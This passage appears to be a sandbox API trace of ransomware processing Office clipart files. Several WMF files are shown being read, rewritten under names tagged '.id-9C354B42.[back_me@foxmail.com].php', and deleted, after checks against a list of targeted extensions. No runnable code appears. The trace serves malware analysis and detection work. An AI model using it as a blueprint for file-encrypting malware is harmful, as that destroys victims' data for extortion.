lstrlenW (lpString=".ppt") returned 4 [0260.564] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63 [0260.564] lstrlenW (lpString=".zip") returned 4 [0260.564] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.564] lstrlenW (lpString=".rar") returned 4 [0260.564] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.564] lstrlenW (lpString=".bz2") returned 4 [0260.564] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.564] lstrlenW (lpString=".7z") returned 3 [0260.564] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63 [0260.564] lstrlenW (lpString=".dbf") returned 4 [0260.564] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63 [0260.564] lstrlenW (lpString=".1cd") returned 4 [0260.564] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63 [0260.564] lstrlenW (lpString=".jpg") returned 4 [0260.564] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63 [0260.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63 [0260.564] lstrlenW (lpString=".doc") returned 4 [0260.565] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.565] lstrlenW (lpString=".docx") returned 5 [0260.565] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0260.565] lstrlenW (lpString=".pdf") returned 4 [0260.565] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.565] lstrlenW (lpString=".xls") returned 4 [0260.565] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.565] lstrlenW (lpString=".xlsx") returned 5 [0260.565] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0260.565] lstrlenW (lpString=".ppt") returned 4 [0260.565] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63 [0260.565] lstrlenW (lpString=".zip") returned 4 [0260.565] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.565] lstrlenW (lpString=".rar") returned 4 [0260.565] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.565] lstrlenW (lpString=".bz2") returned 4 [0260.565] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.565] lstrlenW (lpString=".7z") returned 3 [0260.565] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63 [0260.565] lstrlenW (lpString=".dbf") returned 4 [0260.565] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63 [0260.565] lstrlenW (lpString=".1cd") returned 4 [0260.565] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106958.WMF") returned 63 [0260.565] lstrlenW (lpString=".jpg") returned 4 [0260.565] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.565] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0260.566] lstrlenW (lpString="J0107264.WMF") returned 12 [0260.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0260.591] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=5272) returned 1 [0260.591] CloseHandle (hObject=0x3d4) returned 1 [0260.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf")) returned 0x20 [0260.591] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0260.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0260.608] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.608] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8 [0260.614] GetLastError () returned 0x0 [0260.614] ReadFile (in: hFile=0x3d4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x1498, lpOverlapped=0x0) returned 1 [0260.616] WriteFile (in: hFile=0x3e8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x14a0, lpOverlapped=0x0) returned 1 [0260.616] ReadFile (in: hFile=0x3d4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0260.617] WriteFile (in: hFile=0x3e8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0260.617] SetEndOfFile (hFile=0x3e8) returned 1 [0260.617] CloseHandle (hObject=0x3e8) returned 1 [0260.617] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.617] SetEndOfFile (hFile=0x3d4) returned 1 [0260.619] CloseHandle (hObject=0x3d4) returned 1 [0260.619] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0260.619] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf")) returned 1 [0260.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63 [0260.619] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63 [0260.619] lstrlenW (lpString=".doc") returned 4 [0260.619] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.619] lstrlenW (lpString=".docx") returned 5 [0260.619] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0260.619] lstrlenW (lpString=".pdf") returned 4 [0260.619] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.619] lstrlenW (lpString=".xls") returned 4 [0260.619] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.620] lstrlenW (lpString=".xlsx") returned 5 [0260.620] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0260.620] lstrlenW (lpString=".ppt") returned 4 [0260.620] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63 [0260.620] lstrlenW (lpString=".zip") returned 4 [0260.620] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.620] lstrlenW (lpString=".rar") returned 4 [0260.620] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.620] lstrlenW (lpString=".bz2") returned 4 [0260.620] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.620] lstrlenW (lpString=".7z") returned 3 [0260.620] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63 [0260.620] lstrlenW (lpString=".dbf") returned 4 [0260.620] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63 [0260.620] lstrlenW (lpString=".1cd") returned 4 [0260.620] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63 [0260.620] lstrlenW (lpString=".jpg") returned 4 [0260.620] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63 [0260.620] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63 [0260.620] lstrlenW (lpString=".doc") returned 4 [0260.620] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.620] lstrlenW (lpString=".docx") returned 5 [0260.620] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0260.620] lstrlenW (lpString=".pdf") returned 4 [0260.620] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.620] lstrlenW (lpString=".xls") returned 4 [0260.620] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.620] lstrlenW (lpString=".xlsx") returned 5 [0260.621] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0260.621] lstrlenW (lpString=".ppt") returned 4 [0260.621] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63 [0260.621] lstrlenW (lpString=".zip") returned 4 [0260.621] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.621] lstrlenW (lpString=".rar") returned 4 [0260.621] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.621] lstrlenW (lpString=".bz2") returned 4 [0260.621] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.621] lstrlenW (lpString=".7z") returned 3 [0260.621] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63 [0260.621] lstrlenW (lpString=".dbf") returned 4 [0260.621] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63 [0260.621] lstrlenW (lpString=".1cd") returned 4 [0260.621] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63 [0260.621] lstrlenW (lpString=".jpg") returned 4 [0260.621] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.621] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0260.621] lstrlenW (lpString="J0107308.WMF") returned 12 [0260.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0260.622] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=15888) returned 1 [0260.622] CloseHandle (hObject=0x3d4) returned 1 [0260.622] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf")) returned 0x20 [0260.622] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0260.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0260.622] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.622] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8 [0260.625] GetLastError () returned 0x0 [0260.625] ReadFile (in: hFile=0x3d4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x3e10, lpOverlapped=0x0) returned 1 [0260.626] WriteFile (in: hFile=0x3e8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x3e20, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x3e20, lpOverlapped=0x0) returned 1 [0260.627] ReadFile (in: hFile=0x3d4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0260.627] WriteFile (in: hFile=0x3e8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0260.627] SetEndOfFile (hFile=0x3e8) returned 1 [0260.627] CloseHandle (hObject=0x3e8) returned 1 [0260.628] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.628] SetEndOfFile (hFile=0x3d4) returned 1 [0260.630] CloseHandle (hObject=0x3d4) returned 1 [0260.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0260.630] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf")) returned 1 [0260.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63 [0260.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63 [0260.630] lstrlenW (lpString=".doc") returned 4 [0260.630] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.630] lstrlenW (lpString=".docx") returned 5 [0260.630] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0260.630] lstrlenW (lpString=".pdf") returned 4 [0260.630] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.630] lstrlenW (lpString=".xls") returned 4 [0260.630] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.630] lstrlenW (lpString=".xlsx") returned 5 [0260.630] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0260.631] lstrlenW (lpString=".ppt") returned 4 [0260.631] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63 [0260.631] lstrlenW (lpString=".zip") returned 4 [0260.631] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.631] lstrlenW (lpString=".rar") returned 4 [0260.631] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.631] lstrlenW (lpString=".bz2") returned 4 [0260.631] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.631] lstrlenW (lpString=".7z") returned 3 [0260.631] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63 [0260.631] lstrlenW (lpString=".dbf") returned 4 [0260.631] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63 [0260.631] lstrlenW (lpString=".1cd") returned 4 [0260.631] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63 [0260.631] lstrlenW (lpString=".jpg") returned 4 [0260.631] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63 [0260.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63 [0260.631] lstrlenW (lpString=".doc") returned 4 [0260.631] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0260.631] lstrlenW (lpString=".docx") returned 5 [0260.631] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0260.631] lstrlenW (lpString=".pdf") returned 4 [0260.631] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0260.631] lstrlenW (lpString=".xls") returned 4 [0260.631] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0260.631] lstrlenW (lpString=".xlsx") returned 5 [0260.631] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0260.632] lstrlenW (lpString=".ppt") returned 4 [0260.632] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0260.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63 [0260.632] lstrlenW (lpString=".zip") returned 4 [0260.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0260.632] lstrlenW (lpString=".rar") returned 4 [0260.632] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0260.632] lstrlenW (lpString=".bz2") returned 4 [0260.632] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0260.632] lstrlenW (lpString=".7z") returned 3 [0260.632] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0260.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63 [0260.632] lstrlenW (lpString=".dbf") returned 4 [0260.632] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0260.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63 [0260.632] lstrlenW (lpString=".1cd") returned 4 [0260.632] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0260.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63 [0260.632] lstrlenW (lpString=".jpg") returned 4 [0260.632] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0260.632] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0260.632] lstrlenW (lpString="J0107314.WMF") returned 12 [0260.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0260.633] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=10852) returned 1 [0260.633] CloseHandle (hObject=0x3d4) returned 1 [0260.633] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf")) returned 0x20 [0260.633] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0260.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0260.633] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.633] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.633] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8 [0260.633] GetLastError () returned 0x0 [0260.633] ReadFile (in: hFile=0x3d4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x2a64, lpOverlapped=0x0) returned 1 [0260.635] WriteFile (in: hFile=0x3e8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x2a70, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x2a70, lpOverlapped=0x0) returned 1 [0260.636] ReadFile (in: hFile=0x3d4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0260.636] WriteFile (in: hFile=0x3e8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0260.636] SetEndOfFile (hFile=0x3e8) returned 1 [0260.636] CloseHandle (hObject=0x3e8) returned 1 [0260.636] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0260.636] SetEndOfFile (hFile=0x3d4) returned 1 [0261.881] CloseHandle (hObject=0x3d4) returned 1 [0261.881] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0261.881] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf")) returned 1 [0261.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63 [0261.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63 [0261.882] lstrlenW (lpString=".doc") returned 4 [0261.882] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0261.882] lstrlenW (lpString=".docx") returned 5 [0261.882] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0261.882] lstrlenW (lpString=".pdf") returned 4 [0261.882] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0261.882] lstrlenW (lpString=".xls") returned 4 [0261.882] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0261.882] lstrlenW (lpString=".xlsx") returned 5 [0261.882] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0261.882] lstrlenW (lpString=".ppt") returned 4 [0261.882] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0261.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63 [0261.882] lstrlenW (lpString=".zip") returned 4 [0261.882] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0261.882] lstrlenW (lpString=".rar") returned 4 [0261.882] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0261.882] lstrlenW (lpString=".bz2") returned 4 [0261.882] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0261.882] lstrlenW (lpString=".7z") returned 3 [0261.882] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0261.882] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63 [0261.882] lstrlenW (lpString=".dbf") returned 4 [0261.882] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0261.882] lstrlenW 